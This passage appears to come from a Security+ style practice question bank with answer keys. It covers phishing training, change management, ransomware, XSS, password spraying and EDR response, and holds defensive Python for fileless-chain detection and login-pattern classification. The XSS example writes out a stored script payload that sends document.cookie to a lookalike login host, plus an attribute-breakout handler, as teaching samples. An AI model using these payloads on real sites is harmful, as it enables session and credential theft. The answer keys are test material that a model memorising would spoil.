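def detect_fileless_chains(events):
    """Return a finding for every script-host -> shell chain that starts from a user
    profile path, writes no executable, and beacons out within NET_WINDOW."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for child in procs.values():
        parent = procs.get(child["ppid"])
        if parent is None or child["image"] not in SHELLS or parent["image"] not in SCRIPT_HOSTS:
            continue
        tree = {parent["pid"], child["pid"]}
        in_user_profile = "\\users\\" in (parent["cmd"] + child["cwd"]).lower()
        dropped = [e["path"] for e in events
                   if e["type"] == "file" and e["pid"] in tree and e["path"].lower().endswith(EXEC_EXT)]
        start, deadline = _ts(child["ts"]), _ts(child["ts"]) + NET_WINDOW
        beacons = [e for e in events
                   if e["type"] == "network" and e["pid"] in tree and start <= _ts(e["ts"]) <= deadline]
        if in_user_profile and not dropped and beacons:
            findings.append({"chain": f"{parent['image']} -> {child['image']}", "pid": child["pid"],
                             "c2": sorted({(b["dst"], b["port"]) for b in beacons})})
    return findings


if __name__ == "__main__":
    for f in detect_fileless_chains(build_telemetry()):
        print(f)
```

Only pid 4188 is reported. The second chain is just as suspicious operationally, but it is a dropper and would be caught by a file-based rule; the benign inventory script has Explorer as its parent and never enters the rule. In a real deployment the parent lookup would use the EDR's process GUIDs rather than reusable PIDs.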

664
Multi-Selecteasy

After a phishing campaign, several employees entered credentials on a fake login page. Management wants a control that both improves user behavior and gives the security team a way to measure whether click rates are going down. Which two actions best meet that goal? Select two.

Select 2 answers
A.Send a reminder email once a year and stop there
B.Run role-based phishing awareness training
C.Disable all external email for every employee
D.Use simulated phishing exercises with reporting metrics
E.Tell users to ignore suspicious messages unless IT calls first
AnswersB, D

Role-based training helps employees recognize threats that match their actual job responsibilities and exposure, and simulated phishing exercises with reporting metrics turn that behavior change into a click rate that can be tracked from one campaign to the next.

Why this answer

Role-based phishing awareness training (B) directly improves user behavior by tailoring content to specific job functions, making the training more relevant and effective. Simulated phishing exercises with reporting metrics (D) provide a measurable way for the security team to track click rates over time, enabling data-driven assessment of improvement. Together, they address both behavioral change and quantifiable measurement.

Exam trap

CompTIA often tests the distinction between passive awareness (like annual emails) and active, measurable training (like simulated phishing with metrics), leading candidates to mistakenly select a single control that only addresses one aspect of the goal.

665
MCQeasy

An administrator wants to add a new vendor IP range to a firewall rule in production. What is the best change-management step to reduce risk?

A.Apply the change immediately during peak business hours.
B.Test and approve the change before implementing it in production.
C.Allow the entire vendor subnet permanently without review.
D.Skip documentation to speed up the rollout.
AnswerB

Change management should include review, approval, and testing before production deployment. This reduces the chance of outages, misconfigurations, and unintended access. A controlled change window and validation steps are especially important for firewall rules because small mistakes can break connectivity or create security gaps.

Why this answer

Option B is correct because change management requires testing and approval before applying changes to production systems. Adding a new vendor IP range to a firewall rule without validation could inadvertently allow malicious traffic or block legitimate traffic, leading to a security breach or service disruption. Testing in a non-production environment or using a change window ensures the rule behaves as intended and aligns with the organization's security policy.

Exam trap

The trap here is that candidates may think immediate implementation (Option A) is acceptable for urgent security fixes, but the question specifies adding a new vendor IP range, which is a planned change that must follow proper change management procedures to avoid unintended access or downtime.

How to eliminate wrong answers

Option A is wrong because applying the change immediately during peak business hours violates change management best practices and risks causing outages or security gaps when the network is under heavy load, making rollback difficult. Option C is wrong because allowing the entire vendor subnet permanently without review bypasses the principle of least privilege and could expose the network to unnecessary risk if the vendor's IP range changes or includes untrusted addresses. Option D is wrong because skipping documentation undermines audit trails and incident response; without records, administrators cannot verify what changes were made or revert them if needed.

666
Multi-Selectmedium

A weekly risk review lists several findings. Which two should be addressed first based on likelihood of exploitation and business impact? Select two.

Select 2 answers
A.An internet-facing VPN appliance with a known exploit and no vendor patch available yet.
B.An internal lab system with an outdated browser component, isolated from production and not customer-facing.
C.A public payroll portal that still uses default administrator credentials.
D.A training virtual machine used offline once per month in a disconnected lab.
E.A documentation site with a spelling error in its banner text.
AnswersA, C

Both findings are publicly exposed, easy to exploit, and high impact: the VPN appliance is a likely entry point into the internal network, and the payroll portal's default administrator credentials require no exploit at all.

Why this answer

Option A is correct because an internet-facing VPN appliance with a known exploit presents a high likelihood of exploitation; attackers actively scan for such devices. With no vendor patch available, the team cannot simply update and move on, so compensating controls (restricting source addresses, disabling the affected feature, or taking the appliance offline) are needed until a fix ships. The combination of high exploitability (public-facing, known exploit) and high business impact (VPN access usually leads to internal network access) makes this a critical risk to address first.

Exam trap

CompTIA often tests the concept that default credentials on a public-facing system (Option C) are a critical risk because they are trivially exploitable (no exploit development needed) and directly impact business operations, such as payroll data exposure, making it a top priority alongside unpatched internet-facing appliances.

667
MCQmedium

A file server suddenly shows renamed files with a new extension, users see a ransom note demanding cryptocurrency, and shadow copies are deleted from the host. Which malware family is the best match?

A.Ransomware, because the attacker is encrypting data and demanding payment to restore access.
B.Trojan, because the attack requires a disguised program to install itself.
C.Spyware, because the attacker is likely trying to monitor file activity.
D.Logic bomb, because the malware likely triggered after a specific condition was met.
AnswerA

Ransomware commonly encrypts files, renames them, deletes recovery points, and leaves a payment demand. The combination of locked data and a ransom note is a strong indicator of this malware family.

Why this answer

Ransomware is the correct classification because the scenario describes file encryption (renamed files with new extensions), a ransom note demanding cryptocurrency, and the deletion of shadow copies (Volume Shadow Copy Service snapshots) to prevent file recovery. These are hallmark behaviors of ransomware, specifically crypto-ransomware, which encrypts data and demands payment for decryption keys.

Exam trap

The trap here is that candidates may confuse ransomware with a Trojan because both can be delivered via social engineering, but the defining behaviors of file encryption, ransom note, and shadow copy deletion are unique to ransomware, not generic malware types.

How to eliminate wrong answers

Option B is wrong because a Trojan is a type of malware that disguises itself as legitimate software to gain access, but it does not inherently perform file encryption or demand ransom; the described behaviors are specific to ransomware, not Trojans. Option C is wrong because spyware is designed to monitor user activity and steal information without the user's knowledge, not to encrypt files or display ransom notes; the deletion of shadow copies and file renaming are not spyware characteristics. Option D is wrong because a logic bomb is a piece of code that executes malicious actions when a specific condition is met (e.g., date or user action), but it does not typically involve file encryption, ransom notes, or cryptocurrency demands; the scenario lacks any trigger condition and instead shows active encryption and extortion.

668
MCQeasy

Based on the exhibit, which control would best reduce unauthorized follow-on entry into the records room?

A.Install a mantrap so only one person can pass through at a time.
B.Add more network firewall rules around the records room door.
C.Increase the screen lock timeout on nearby workstations.
D.Replace the UPS batteries to stop unauthorized people from entering.
AnswerA

A mantrap is designed to prevent tailgating and piggybacking by controlling one person through an entry point at a time. The exhibit shows someone followed an authorized employee into a sensitive room after the badge granted access. A mantrap directly addresses that weakness and is a common physical-security control for restricted areas.

Why this answer

A mantrap (called an access control vestibule in the SY0-701 objectives) is a physical security control consisting of a small space with two interlocking doors, designed to allow only one person to pass at a time. This prevents tailgating and piggybacking, which are common methods of unauthorized follow-on entry into a restricted area like a records room.

Exam trap

The trap here is that candidates may confuse logical access controls (firewall rules, screen lock timeouts) or power-related controls (UPS) with physical access controls, failing to recognize that the question specifically targets unauthorized follow-on entry through a physical door.

How to eliminate wrong answers

Option B is wrong because network firewall rules control logical access to network resources, not physical entry through a door. Option C is wrong because increasing the screen lock timeout on workstations reduces the risk of unauthorized logical access to a computer, but does nothing to prevent a person from physically following an authorized user into the records room. Option D is wrong because replacing UPS batteries ensures backup power for equipment, but has no effect on preventing unauthorized physical entry.

669
MCQeasy

A file server begins encrypting documents, and the SOC confirms the activity is malicious. Which incident response step should happen first to limit further damage?

A.Lessons learned
B.Containment
C.Recovery
D.Post-incident reporting
AnswerB

Containment is the first response step that limits spread and stops the incident from getting worse.

Why this answer

Containment is the correct first step because it isolates the compromised file server from the network, preventing the ransomware from encrypting additional shares or spreading laterally. For example, blocking SMB (TCP 445) to and from the server at the switch or firewall, or disabling its network interface, halts further encryption of documents. This aligns with the NIST SP 800-61 incident response lifecycle, where containment precedes eradication and recovery.

Exam trap

CompTIA often tests the misconception that recovery (e.g., restoring from backup) is the first priority, but containment must come first to stop the active damage and prevent reinfection.

How to eliminate wrong answers

Option A is wrong because lessons learned occurs after the incident is fully resolved, not during active encryption. Option C is wrong because recovery (e.g., restoring from backups) cannot happen until the threat is contained and eradicated; attempting recovery first could re-encrypt data. Option D is wrong because post-incident reporting is a final step for documentation and compliance, not an immediate action to limit damage.

670
MCQmedium

During malware containment, an analyst needs to preserve transient information from a compromised Windows workstation that is still running. Which action is MOST appropriate before shutdown or imaging?

A.Capture memory and live process information with approved response tools
B.Immediately unplug the workstation and carry it to the evidence room
C.Run a full antivirus scan to clean the machine before analysis
D.Clear the event logs so the malicious activity is easier to isolate
AnswerA

Live memory and process data can disappear on shutdown, so capturing them preserves valuable forensic evidence.

Why this answer

Option A is correct because transient information such as running processes, network connections, and memory-resident malware is lost when the system is powered off. Capturing memory and live process data with approved forensic tools (e.g., FTK Imager, DumpIt, or WinPmem) preserves volatile evidence critical for incident analysis and attribution, in accordance with the order of volatility (RFC 3227).

Exam trap

The trap here is that candidates may think immediate power-off preserves evidence, but it actually destroys volatile data, which is the most time-sensitive and valuable for incident response.

How to eliminate wrong answers

Option B is wrong because immediately unplugging the workstation causes a loss of volatile data (memory, network connections, running processes) and may corrupt the file system, destroying transient evidence. Option C is wrong because running a full antivirus scan modifies the system state, potentially deleting or altering malware artifacts and violating forensic integrity principles. Option D is wrong because clearing event logs destroys historical evidence of malicious activity, making it harder to reconstruct the attack timeline and violating the preservation of evidence.

671
Multi-Selecteasy

Which two actions are examples of accounting in AAA? Select two.

Select 2 answers
A.Recording successful logons in a security log
B.Checking a username and password before access
C.Tracking which files a user opened during a session
D.Granting access to the finance folder
E.Requiring a fingerprint and a password
AnswersA, C

Logging logons creates an audit trail, and tracking which files a user opened records resource usage; both are core accounting functions.

Why this answer

Option A is correct because accounting in AAA involves recording user activities, such as successful logons, in a security log. This provides an audit trail for monitoring and compliance. Option C is correct because tracking which files a user opened during a session is a form of accounting that logs resource access for accountability and usage analysis.

Exam trap

CompTIA often tests the distinction between authentication (verifying identity), authorization (granting permissions), and accounting (logging actions), so the trap here is confusing authorization actions (like granting folder access) or authentication methods (like multifactor) with accounting, which only records events after they occur.

672
MCQmedium

A web application lets users save a profile "display name." One employee enters a value that contains script code, and later other users who view that profile start seeing pop-ups and redirects to a fake login page. Which attack is most likely occurring?

A.SQL injection, because the database is being queried with unsafe concatenated input.
B.Cross-site scripting, because untrusted content is executed in another user's browser context.
C.Cross-site request forgery, because the attacker is forcing the victim to submit a form automatically.
D.Broken authentication, because the login system is failing to verify usernames correctly.
AnswerB

Cross-site scripting occurs when attacker-supplied input is rendered as active script, allowing redirects, pop-ups, and credential theft in other users' sessions.

Why this answer

Option B is correct because the employee's display name containing script code is stored in the database and later rendered in the browsers of other users without proper sanitization. This is a classic stored cross-site scripting (XSS) attack, where untrusted user input is executed as HTML/JavaScript in the context of another user's session, leading to pop-ups and redirects to a fake login page.

Exam trap

The trap here is that candidates may confuse stored XSS with SQL injection because both involve database storage, but the key distinction is that XSS executes client-side scripts in another user's browser, whereas SQL injection manipulates server-side queries.

How to eliminate wrong answers

Option A is wrong because SQL injection involves manipulating database queries through unsafe concatenation of input, but the described behavior (pop-ups and redirects in other users' browsers) is a client-side script execution, not a server-side database manipulation. Option C is wrong because cross-site request forgery (CSRF) forces a victim to submit a forged request, but the attack here involves script execution in the browser, not unauthorized form submissions. Option D is wrong because broken authentication refers to flaws in login verification or session management, whereas the issue is that untrusted content is executed in the browser, not that authentication is bypassed.
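The fix for this question's scenario is output encoding at render time, not filtering at save time, because the same stored value may be rendered into several HTML contexts. The block below is an added example written for this page, not the application from the question: it stores a constructed payload as a display name, renders it once the vulnerable way and once with context-appropriate escaping, and then uses Python's own HTML parser as a crude stand-in for the browser to count what would actually execute. The profile fields, the accounts-login.invalid host and a second payload aimed at an attribute context are all constructed for the illustration.

```python
"""Stored XSS: the vulnerable render beside the hardened one (added example).

The profile record, both payloads and the hypothetical login-lookalike host are
constructed for illustration; nothing here is the application from the question.
"""
import html
from html.parser import HTMLParser

# What the employee typed into "display name": a redirect to a fake login page
# that carries the viewer's cookies. A second value targets an attribute context.
PAYLOAD = '<script>location="https://accounts-login.invalid/?c="+document.cookie</script>'
PROFILE = {"display_name": PAYLOAD, "title": 'x" onmouseover="alert(document.domain)'}


def render_profile_vulnerable(profile):
    """Interpolates stored data straight into HTML: whatever was saved is executed."""
    return (f"<h1>{profile['display_name']}</h1>\n"
            f"<p title=\"{profile['title']}\">{profile['title']}</p>")


def render_profile_safe(profile):
    """Output-encodes each value for the HTML context it lands in. quote=True also
    escapes quotes, which is what stops a value from breaking out of an attribute."""
    name = html.escape(profile["display_name"], quote=True)
    title = html.escape(profile["title"], quote=True)
    return (f"<h1>{name}</h1>\n"
            f"<p title=\"{title}\">{title}</p>")


class _TagCollector(HTMLParser):
    """Records start tags and their attributes, the way a browser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def active_content(markup):
    """What would execute in a viewer's browser: script elements and on* handlers."""
    parser = _TagCollector()
    parser.feed(markup)
    scripts = sum(1 for tag, _ in parser.tags if tag == "script")
    handlers = [name for _, attrs in parser.tags for name in attrs if name.startswith("on")]
    return {"script_tags": scripts, "event_handlers": handlers}


if __name__ == "__main__":
    print("vulnerable:", active_content(render_profile_vulnerable(PROFILE)))
    print("safe:      ", active_content(render_profile_safe(PROFILE)))
```

The vulnerable render yields one script element and an onmouseover handler; the safe render yields neither, and the payload is displayed literally as the user's odd-looking name. A Content-Security-Policy that disallows inline script is a sensible second layer, but it does not replace encoding, and encoding for HTML text is not sufficient for a value placed inside a JavaScript string or a URL, which need their own encoders.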

673
Multi-Selectmedium

A SIEM alert shows a successful sign-in to a cloud admin portal from an unusual country, followed by mailbox forwarding-rule changes four minutes later. Which two log sources should the analyst review first to confirm whether the account was abused? Select two.

Select 2 answers
A.Identity provider and MFA authentication logs for the account session
B.Cloud application audit logs for mailbox and rule changes
C.Printer spooler logs from the user’s workstation
D.DHCP lease logs for the office network
E.USB device connection logs from the user’s laptop
AnswersA, B

These logs show whether the sign-in was legitimate, challenged, or bypassed by a compromised session.

Why this answer

Option A is correct because the identity provider (IdP) logs will show the authentication method used (e.g., SAML, OIDC) and the MFA logs will confirm whether a valid second factor was presented. If the sign-in succeeded without MFA or with a compromised token, it indicates account takeover. These logs are the first place to verify the legitimacy of the session. Option B is correct because the cloud application's audit log records who created or changed the mailbox forwarding rule, from which session and client, and where mail is being sent; that is the direct evidence of abuse and tells the responder exactly what to undo.

Exam trap

The trap here is that candidates may focus on network-level logs (DHCP, printer) because they associate 'unusual country' with network location, but the question specifically requires logs that directly capture authentication events and mailbox rule changes in the cloud.

674
MCQmedium

A SIEM correlates VPN logs and sees the same public IP make one failed login attempt against 56 different user accounts over 25 minutes. The usernames vary, but the password value appears to be the same in each attempt. Ten minutes later, one of those accounts authenticates successfully from the same IP, and no password-reset events are recorded. Which attack pattern is most likely?

A.Password spraying against multiple accounts with a shared password guess.
B.A brute-force attack focused on a single account with repeated rapid guesses.
C.A replay attack using captured authentication traffic from a previous session.
D.Credential stuffing using known breached username and password pairs.
AnswerA

This pattern matches password spraying because the attacker tries one common password across many usernames to avoid lockouts and reduce noisy failures. The same source IP, low failure count per account, and eventual success on one account are classic clues. Analysts should treat the successful login as potentially compromised and review related authentication, MFA, and session activity immediately.

Why this answer

The SIEM logs show the same public IP attempting to authenticate with 56 different usernames using the same password. This is the hallmark of a password spraying attack, where an attacker tries a single common password against many accounts to avoid account lockout policies. The subsequent successful authentication from the same IP, without a password reset, confirms the guessed password was valid for one account.

Exam trap

The trap here is that candidates confuse password spraying with brute-force attacks, failing to recognize that the key differentiator is the single password used against multiple accounts versus multiple passwords against a single account.

How to eliminate wrong answers

Option B is wrong because a brute-force attack focuses on a single account with many rapid password guesses, not a single password against many accounts. Option C is wrong because a replay attack would reuse captured authentication tokens or hashes from a previous session, not attempt login with a plaintext password across multiple usernames. Option D is wrong because credential stuffing replays breached username and password pairs, so each account would be tried with its own leaked password rather than one value reused across all 56 accounts.
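The distinction the question turns on (one password across many accounts versus many passwords against one account) is visible in the shape of failed logins even though real authentication logs never expose the password value. The block below is an added example for this page, not code from any SIEM: it builds constructed login events for a spraying source, a brute-force source and an ordinary user, classifies each source IP from the number of accounts targeted and the attempts per account, and lists accounts that later succeeded from the attacker's IP without a password reset, which is what the analyst should review first. The IP addresses, account names, thresholds and field names are assumptions.

```python
"""Classify failed-login shape per source IP: spraying vs brute force (added example).

Events are constructed; thresholds and field names are assumptions. Real
authentication logs do not expose the password value, so the classifier works
from the shape of the attempts, which is what an analyst can actually see.
"""
from collections import Counter
from datetime import datetime, timedelta

SPRAY_MIN_USERS = 10        # many distinct accounts ...
SPRAY_MAX_PER_USER = 3      # ... each tried only a few times, to stay under lockout
BRUTE_MIN_ATTEMPTS = 20     # many attempts against one or two accounts


def build_events():
    """Constructed sample modelled on the question plus a brute-force source and a
    legitimate user who mistyped twice, logged in, and later reset the password."""
    base = datetime(2024, 3, 4, 2, 0, 0)
    ev = []
    for i in range(56):                                  # spray: 56 accounts, one failure each, 25 minutes
        ev.append({"ts": base + timedelta(seconds=int(i * 1500 / 56)), "type": "auth",
                   "src": "198.51.100.23", "user": f"user{i:02d}", "result": "fail"})
    ev.append({"ts": base + timedelta(minutes=35), "type": "auth",    # one account succeeds later
               "src": "198.51.100.23", "user": "user17", "result": "success"})
    for i in range(40):                                  # brute force: 40 tries on one account in 5 minutes
        ev.append({"ts": base + timedelta(seconds=7 * i), "type": "auth",
                   "src": "203.0.113.9", "user": "admin", "result": "fail"})
    for r in ("fail", "fail", "success"):                # ordinary user, two typos then success
        ev.append({"ts": base + timedelta(hours=6), "type": "auth",
                   "src": "10.20.0.44", "user": "mlee", "result": r})
    ev.append({"ts": base + timedelta(hours=7), "type": "password_reset", "user": "mlee"})
    return ev


def profile_source(events, ip):
    """Classify the failed-login pattern from one source IP and list accounts that
    failed, then succeeded from that IP, with no password reset on record."""
    fails = [e for e in events if e["type"] == "auth" and e["src"] == ip and e["result"] == "fail"]
    per_user = Counter(e["user"] for e in fails)
    if not per_user:
        return {"pattern": "no_pattern", "users_targeted": 0, "failed_attempts": 0,
                "accounts_to_review": []}
    users, attempts, worst = len(per_user), sum(per_user.values()), max(per_user.values())
    if users >= SPRAY_MIN_USERS and worst <= SPRAY_MAX_PER_USER:
        pattern = "password_spraying"
    elif users <= 2 and attempts >= BRUTE_MIN_ATTEMPTS:
        pattern = "brute_force"
    else:
        pattern = "no_pattern"
    reset = {e["user"] for e in events if e["type"] == "password_reset"}
    succeeded = {e["user"] for e in events
                 if e["type"] == "auth" and e["src"] == ip and e["result"] == "success"}
    review = sorted(u for u in succeeded if u in per_user and u not in reset)
    return {"pattern": pattern, "users_targeted": users, "failed_attempts": attempts,
            "accounts_to_review": review}


if __name__ == "__main__":
    ev = build_events()
    for ip in ("198.51.100.23", "203.0.113.9", "10.20.0.44"):
        print(ip, profile_source(ev, ip))
```

The spraying source is reported with 56 accounts targeted, one failure each, and user17 flagged for review; the brute-force source is reported with one account and 40 failures; the ordinary user falls below both thresholds. Credential stuffing is not separable from spraying by this logic alone, since the password is never logged; the usual tell is that stuffing produces a higher success rate and the username list matches a known breach.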

675
Multi-Selecthard

EDR reports that a workstation launched PowerShell from a word processor, created a scheduled task named WinUpdateSvc, and began making repeated HTTPS connections to a rare external domain. The user is still logged in to several cloud apps. Which two response actions are best to initiate from the EDR console? Select two.

Select 2 answers
A.Isolate the endpoint from the network to stop further communication and lateral movement.
B.Collect an EDR triage package or memory-focused artifact before powering the device off.
C.Delete the scheduled task immediately so the host returns to normal operation.
D.Reimage the workstation from the golden image as the first response.
E.Ignore the alert because the PowerShell binary is built into Windows and therefore safe.
AnswersA, B

Isolation is the fastest way to contain a compromised endpoint when the device is still active. It prevents additional command-and-control traffic, reduces the chance of lateral movement, and can be done without immediately shutting down the machine. This is the primary EDR containment action in a live incident. Collecting a triage package or memory-focused artifact before any power-off (Option B) preserves the volatile evidence of the in-memory PowerShell activity and the scheduled task, which a reboot or reimage would destroy; most EDR platforms keep their own management channel open while a host is isolated, so this collection does not require lifting the isolation.

Why this answer

Option A is correct because isolating the endpoint from the network immediately stops the active HTTPS command-and-control (C2) communication and prevents lateral movement to other systems. Given the suspicious chain (word processor spawning PowerShell, creating a scheduled task, and connecting to a rare external domain), this is a strong indicator of a malware infection or unauthorized remote access. Isolation preserves the forensic state while cutting off the attacker's access.

Exam trap

The trap here is that candidates may think deleting the scheduled task (Option C) is sufficient to remediate, but the exam emphasizes that removing artifacts without addressing the root cause is ineffective, and that isolation and forensic collection are the correct first steps in incident response.
